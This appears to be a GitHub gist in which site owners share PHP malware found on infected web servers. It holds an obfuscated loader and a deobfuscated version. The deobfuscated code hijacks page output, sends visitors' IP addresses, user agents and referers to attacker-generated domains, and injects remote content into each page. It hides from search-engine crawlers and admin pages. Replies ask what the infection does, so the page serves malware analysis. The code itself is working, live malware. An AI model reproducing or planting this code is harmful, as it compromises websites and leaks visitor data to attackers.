5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gx5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x78!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mmx7825t2w>#]y74]273]y76]252]y%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%-111112)eobs%x5c%x7860un>qp%x5c%xeturn chr(ord($n)-1);} @error_reporting(0); x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufsgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5p%x5c%x7825mm)%x5c%x7825%%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x78%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c25!<***f%x5c%x7827,*e25j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!2985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]8<%x22%51%x29%51%x29%73", NULL);c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x7pd%x5c%x78256<pd%x5c%x7825w5!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x78256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277].fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x&7-n%x5c%x7825)utjm6<%x5c%x787fw6*tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]KfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x78 }s)%x5c%x7825j>1<%x5c%x7825j=6[7>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7885]256]y6g]257]y86]267]y74]275]y7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x78277825!|Z~!<##!>!2p%x5c%x78%62%x35%165%x3a%146%x21^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gp5%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c5h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x57825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#)ujojR%x5c%x7827id%x5c%x78x5c%x7878:-!%x5c%x7825tzw%x5c4%162%x5f%163%x70%154%x69%164%50%x22%134%x75c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x7842%x66%152%x66%147%x67%42%x2c%163%x7)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x782ufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~2]285]Ke]53Ld]53]Kc]55Ld]5587fw6*CW&)7gj6<.[A%x5c%x7827&6<%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%<.5%x5c%x7860hA%x5c%x7826Z6<.4%x5c%x7860hA%x5c%x7%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7]364]6]234]342]58]24]31#-%x5c%x7U,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*<~%x5c%x7824<!%x5c%x7825o:!>&& (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { %x782f},;#-#}+;%x5c%x7825-qpx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!c%x785c1^-%x5c%x7825r%x5c%x785c2^-%825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfy72]265]y39]271]y83]256]y78]248]y83]256]%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%]y7d]252]y74]256#<!%x5c%x7825f!>!#]y81]273]y76]258]y6g]273]y76]271x7825z-#:#*%x5c%x7824-%x5cc%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f295c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x782x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c142%x5f%163%x74%141%x72%164") #jt0}Z;0]=]0#)2q%x5c%x7825l}S;2CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x782525)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJ5c%x7825%x5c%x787f!~!<##!>!2p%x5c%xx5c%x7825:-t%x5c%x7825)3of:opjudovg5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*dyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpj^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%oj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<-u%x5c%x7825!-#2#%x5c%x782f#%xx5c%x7825,3,j%x5c%x7825>j%x5cpd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x7824!>!tus%x5c%x7860sfqmbdf)%x86+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%f%x5c%x78604%x5c%x78223}!+!<+{e%x5#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7sut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x7824b!>!%x5c%x7825yy)#}#-#2f7#@#7%x5c%x782f7^#iubq#%x5c5%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x720QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787o)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%f2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x782zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%$GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){r5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%xj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcx7825V<*#fopoV;hojepdoF.u860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c8297f:5297e:56-%x5c%x7878r.985:5%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x55c%x7825-#1]#-bubE{h%x5c%x7825)%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x78257-K)udfoopdXA%x5c%x7822)7gif((function_exists("%x6f%/(.*)/epreg_replacesgeocmclkg';

$wzrfkwxlic = array(
  0 => '10080',
  1 => '26',
  2 => '8123',
  3 => '30',
  4 => '7364',
  5 => '50',
  6 => '9534',
  7 => '56',
  8 => '5242',
  9 => '44',
  10 => '136',
  11 => '45',
  12 => '9176',
  13 => '57',
  14 => '4378',
  15 => '33',
  16 => '6894',
  17 => '36',
  18 => '6743',
  19 => '43',
  20 => '6303',
  21 => '24',
  22 => '2782',
  23 => '44',
  24 => '2424',
  25 => '32',
  26 => '834',
  27 => '21',
  28 => '3834',
  29 => '34',
  30 => '7156',
  31 => '24',
  32 => '5700',
  33 => '28',
  34 => '7180',
  35 => '25',
  36 => '6221',
  37 => '58',
  38 => '8758',
  39 => '60',
  40 => '7795',
  41 => '59',
  42 => '4228',
  43 => '24',
  44 => '5858',
  45 => '34',
  46 => '8184',
  47 => '34',
  48 => '6147',
  49 => '41',
  50 => '2071',
  51 => '20',
  52 => '8053',
  53 => '70',
  54 => '983',
  55 => '22',
  56 => '1123',
  57 => '40',
  58 => '9831',
  59 => '35',
  60 => '5438',
  61 => '49',
  62 => '10048',
  63 => '32',
  64 => '1214',
  65 => '64',
  66 => '5954',
  67 => '55',
  68 => '2502',
  69 => '26',
  70 => '4839',
  71 => '50',
  72 => '4745',
  73 => '28',
  74 => '5002',
  75 => '62',
  76 => '9147',
  77 => '29',
  78 => '9466',
  79 => '68',
  80 => '3451',
  81 => '66',
  82 => '7205',
  83 => '51',
  84 => '9791',
  85 => '40',
  86 => '8383',
  87 => '63',
  88 => '8662',
  89 => '37',
  90 => '5821',
  91 => '37',
  92 => '2111',
  93 => '50',
  94 => '1759',
  95 => '32',
  96 => '2886',
  97 => '42',
  98 => '8218',
  99 => '57',
  100 => '7288',
  101 => '48',
  102 => '6688',
  103 => '26',
  104 => '886',
  105 => '65',
  106 => '7061',
  107 => '31',
  108 => '1342',
  109 => '59',
  110 => '1719',
  111 => '40',
  112 => '2396',
  113 => '28',
  114 => '2697',
  115 => '64',
  116 => '2456',
  117 => '46',
  118 => '4555',
  119 => '49',
  120 => '7639',
  121 => '64',
  122 => '4944',
  123 => '58',
  124 => '9647',
  125 => '57',
  126 => '5286',
  127 => '47',
  128 => '4889',
  129 => '55',
  130 => '5728',
  131 => '45',
  132 => '1087',
  133 => '36',
  134 => '1401',
  135 => '24',
  136 => '9951',
  137 => '31',
  138 => '8604',
  139 => '58',
  140 => '8729',
  141 => '29',
  142 => '472',
  143 => '67',
  144 => '385',
  145 => '36',
  146 => '9704',
  147 => '62',
  148 => '421',
  149 => '51',
  150 => '1191',
  151 => '23',
  152 => '7529',
  153 => '70',
  154 => '0',
  155 => '41',
  156 => '8275',
  157 => '35',
  158 => '1603',
  159 => '23',
  160 => '1515',
  161 => '23',
  162 => '2761',
  163 => '21',
  164 => '85',
  165 => '51',
  166 => '1626',
  167 => '66',
  168 => '4674',
  169 => '37',
  170 => '5394',
  171 => '44',
  172 => '5487',
  173 => '21',
  174 => '1538',
  175 => '65',
  176 => '2014',
  177 => '57',
  178 => '5209',
  179 => '33',
  180 => '6279',
  181 => '24',
  182 => '2574',
  183 => '39',
  184 => '9072',
  185 => '48',
  186 => '7442',
  187 => '52',
  188 => '9898',
  189 => '53',
  190 => '855',
  191 => '31',
  192 => '723',
  193 => '62',
  194 => '1005',
  195 => '29',
  196 => '3981',
  197 => '69',
  198 => '3868',
  199 => '59',
  200 => '9233',
  201 => '53',
  202 => '2264',
  203 => '36',
  204 => '2826',
  205 => '60',
  206 => '3150',
  207 => '61',
  208 => '4504',
  209 => '23',
  210 => '785',
  211 => '49',
  212 => '6635',
  213 => '53',
  214 => '6426',
  215 => '37',
  216 => '7414',
  217 => '28',
  218 => '1890',
  219 => '61',
  220 => '6984',
  221 => '50',
  222 => '3065',
  223 => '29',
  224 => '2091',
  225 => '20',
  226 => '181',
  227 => '44',
  228 => '5333',
  229 => '37',
  230 => '3757',
  231 => '22',
  232 => '8973',
  233 => '34',
  234 => '352',
  235 => '33',
  236 => '6930',
  237 => '54',
  238 => '2300',
  239 => '50',
  240 => '3732',
  241 => '25',
  242 => '6463',
  243 => '70',
  244 => '7854',
  245 => '41',
  246 => '602',
  247 => '63',
  248 => '1450',
  249 => '65',
  250 => '9766',
  251 => '25',
  252 => '2613',
  253 => '51',
  254 => '8446',
  255 => '56',
  256 => '6844',
  257 => '50',
  258 => '951',
  259 => '32',
  260 => '3687',
  261 => '45',
  262 => '8153',
  263 => '31',
  264 => '8699',
  265 => '30',
  266 => '8345',
  267 => '38',
  268 => '9410',
  269 => '56',
  270 => '4411',
  271 => '43',
  272 => '3541',
  273 => '58',
  274 => '6009',
  275 => '36',
  276 => '3211',
  277 => '66',
  278 => '5119',
  279 => '28',
  280 => '6188',
  281 => '33',
  282 => '4276',
  283 => '44',
  284 => '9982',
  285 => '66',
  286 => '3326',
  287 => '65',
  288 => '4527',
  289 => '28',
  290 => '3391',
  291 => '60',
  292 => '288',
  293 => '64',
  294 => '7092',
  295 => '64',
  296 => '4320',
  297 => '58',
  298 => '4170',
  299 => '27',
  300 => '8310',
  301 => '35',
  302 => '7336',
  303 => '28',
  304 => '5064',
  305 => '55',
  306 => '7733',
  307 => '36',
  308 => '7703',
  309 => '30',
  310 => '9354',
  311 => '56',
  312 => '6359',
  313 => '67',
  314 => '8548',
  315 => '56',
  316 => '9120',
  317 => '27',
  318 => '4711',
  319 => '34',
  320 => '7769',
  321 => '26',
  322 => '8878',
  323 => '32',
  324 => '9590',
  325 => '57',
  326 => '8011',
  327 => '42',
  328 => '1842',
  329 => '48',
  330 => '225',
  331 => '63',
  332 => '3779',
  333 => '55',
  334 => '8502',
  335 => '46',
  336 => '9286',
  337 => '68',
  338 => '2528',
  339 => '46',
  340 => '3956',
  341 => '25',
  342 => '4197',
  343 => '31',
  344 => '5651',
  345 => '49',
  346 => '3038',
  347 => '27',
  348 => '5147',
  349 => '62',
  350 => '1163',
  351 => '28',
  352 => '6045',
  353 => '70',
  354 => '3094',
  355 => '56',
  356 => '4252',
  357 => '24',
  358 => '3517',
  359 => '24',
  360 => '2998',
  361 => '40',
  362 => '7494',
  363 => '35',
  364 => '2210',
  365 => '54',
  366 => '9007',
  367 => '65',
  368 => '665',
  369 => '24',
  370 => '6533',
  371 => '61',
  372 => '9866',
  373 => '32',
  374 => '5567',
  375 => '53',
  376 => '1791',
  377 => '51',
  378 => '4773',
  379 => '66',
  380 => '4454',
  381 => '50',
  382 => '1034',
  383 => '53',
  384 => '5892',
  385 => '62',
  386 => '7034',
  387 => '27',
  388 => '1425',
  389 => '25',
  390 => '1278',
  391 => '64',
  392 => '6786',
  393 => '58',
  394 => '3650',
  395 => '37',
  396 => '1692',
  397 => '27',
  398 => '2928',
  399 => '70',
  400 => '41',
  401 => '44',
  402 => '7256',
  403 => '32',
  404 => '689',
  405 => '34',
  406 => '7954',
  407 => '57',
  408 => '8910',
  409 => '63',
  410 => '3599',
  411 => '51',
  412 => '5508',
  413 => '59',
  414 => '7895',
  415 => '59',
  416 => '1951',
  417 => '63',
  418 => '539',
  419 => '63',
  420 => '6327',
  421 => '32',
  422 => '6117',
  423 => '30',
  424 => '3277',
  425 => '49',
  426 => '4104',
  427 => '66',
  428 => '8818',
  429 => '60',
  430 => '5370',
  431 => '24',
  432 => '6714',
  433 => '29',
  434 => '4050',
  435 => '54',
  436 => '2161',
  437 => '49',
  438 => '6594',
  439 => '41',
  440 => '4604',
  441 => '70',
  442 => '5773',
  443 => '48',
  444 => '7599',
  445 => '40',
  446 => '2350',
  447 => '46',
  448 => '2664',
  449 => '33',
  450 => '3927',
  451 => '29',
  452 => '5620',
  453 => '31',
  454 => '6115',
  455 => '2',
);

if (!function_exists('tttchsrlcp')) {
    function tttchsrlcp($a, $b) {

        $whghqcixdu = NULL;

        for($i = 0; $i < (sizeof($a) / 2); $i++) {
            $whghqcixdu .= substr($b, $a[($i * 2)], $a[($i * 2) + 1]);
        }

        return $whghqcixdu;
    }
}

$nfumbfnqsz = die(str_replace(chr((175-138)), chr((573-481)), tttchsrlcp($wzrfkwxlic,$tngmufxact)));


$nfumbfnqsz = 121;
$tngmufxact = 120;

@klein0r
Copy link
Author

klein0r commented Jul 10, 2015

#2

<?php

if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
    $GLOBALS["anuna"]=1;
    function fjfgg($n){return chr(ord($n)-1);}
    @error_reporting(0);

    function cqq($qw) {
        return random($domarr,$qw);
    }

    function en2($s, $q) {
        $g = "";
        while (strlen($g) < strlen($s)) {
            $q = pack("H*", md5($g.$q."q1w2e3r4"));
            $g.=substr($q,0,8);
        }

        return $s^$g;
    }

    function random($arr,$qw) {
        $arr = str_split(md5($qw.gethostbyname("stat-dns".$qw)), 8);
        return $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw;
    }

    function g_1($url) {
        if (function_exists("file_get_contents") === false) return false;
        $buf = @file_get_contents($url);
        if ($buf == "") return false;
        return $buf;
    }

    function g_2($url) {
        if (function_exists("curl_init") === false) return false;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $res = curl_exec($ch);
        curl_close($ch);
        if ($res == "") return false;
        return $res;
    }

    function g_3($url) {
        if (function_exists("file") === false) return false;
        $inc = @file($url);
        $buf = @implode("", $inc);
        if ($buf == "") return false;
        return $buf;
    }

    function g_4($url) {
        if (function_exists("socket_create") === false) return false;
        $p= @parse_url($url);
        $host = $p["host"];
        if(!isset($p["query"])) $p["query"]="";
        $uri = $p["path"] . "?" . $p["query"];
        $ip1 = @gethostbyname($host);
        $ip2 = @long2ip(@ip2long($ip1));
        if ($ip1 != $ip2) return false;
        $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if (!@socket_connect($sock, $ip1, 80)) {
            @socket_close($sock);
            return false;
        }

        $req = "GET $uri HTTP/1.0\n";
        $req .= "Host: $host\n\n";
        socket_write($sock, $req);
        $buf = "";
        while ($t = socket_read($sock, 10000)) {
            $buf .= $t;
        }

        @socket_close($sock);
        if ($buf == "") return false;
        list($m, $buf) = explode("\r\n\r\n", $buf);
        return $buf;
    }

    function gtd ($url) {
        $co = "";
        $co = @g_1($url);
        if ($co !== false) return $co;
        $co = @g_2($url);
        if ($co !== false) return $co;
        $co = @g_3($url);
        if ($co !== false) return $co;
        $co = @g_4($url);
        if ($co !== false) return $co;
        return "";
    }

    if (!function_exists("comgzi")) {
        function comgzi($gzData) {
            if (substr($gzData,0,3)=="\x1f\x8b\x08") {
                $i=10;
                $flg=ord(substr($gzData,3,1));
                if ($flg>0) {
                    if ($flg & 4) {
                        list($xlen)=unpack("v",substr($gzData,$i,2));
                        $i=$i+2+$xlen;
                    }

                    if ($flg & 8) $i=strpos($gzData,"\0",$i)+1;
                    if ($flg & 16) $i=strpos($gzData,"\0", $i)+1;
                    if ( $flg & 2) $i=$i+2;
                }

                return @gzinflate(substr($gzData,$i,-8));
            } else{
             return false;
            }
        }
    }

    function k34($op,$text) {
        return base64_encode(en2($text, $op));
    }

    function check212($param) {
        if(!isset($_SERVER[$param])) $a="non";
        else if ($_SERVER[$param]=="") $a="non";
        else $a=$_SERVER[$param];
        return $a;
    }

    function day212() {
        $a=check212("HTTP_USER_AGENT");
        $b=check212("HTTP_REFERER");
        $c=check212("REMOTE_ADDR");
        $d=check212("HTTP_HOST");
        $e=check212("PHP_SELF");
        $domarr = array("33db9538","9507c4e8","e5b57288","54dfa1cb");
        if (($a=="non") or ($c=="non") or ($d=="non") or strrpos(strtolower($e),"admin") or (preg_match("/" . implode("|", array("google","slurp","msnbot","ia_archiver","yandex","rambler")) . "/i", strtolower($a))) ) {
            $o1 = "";
        } else {
            $op=mt_rand(100000,999999);
            $g4=$op."?".urlencode(urlencode(k34($op,$a).".".k34($op,$b).".".k34($op,$c).".".k34($op,$d).".".k34($op,$e)));
            $url="http://".cqq(".com")."/".$g4;
            $ca1=en2(@gtd($url),$op);
            $a1=@explode("!NF0",$ca1);
            if (sizeof($a1)>=2) $o1 = $a1[1];
            else $o1 = "";
        }

        return $o1;
    }

    if (!function_exists("dcoo")) {
        function dcoo($cz, $length = null) {
            if (false !== ($dz = @gzinflate($cz) ) ) return $dz;
            if (false !== ($dz = @comgzi($cz) ) ) return $dz;
            if (false !== ($dz = @gzuncompress($cz) ) ) return $dz;
            if (function_exists("gzdecode") ) {
                $dz = @gzdecode($cz);
                if (false !==$dz ) return $dz;
            }

            return $cz;
        }
    }

    if(!function_exists("pa22")) {
        function pa22($v) {
            Header("Content-Encoding: none");
            $t=dcoo($v);
            if(preg_match("/\<\/body/si",$t)) {
                return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n"."$"."1", $t,1);
            } else {
                if(preg_match("/\<\/html/si",$t)) {
                    return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n"."$"."1", $t,1);
                } else {
                    return $t;
                }
            }
        }
    }

    ob_start("pa22");
}

@xavivars
Copy link

Hi,

I had this same issue. Do you know (by any chance) what gets really affected with this infection?

@walkingmiller
Copy link

Hello!

Looks like I have come across something very similar (seems to have mutated the specifics a bit). Did you ever figure out exactly what it is trying to do in #1 or other details?

Thank you!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment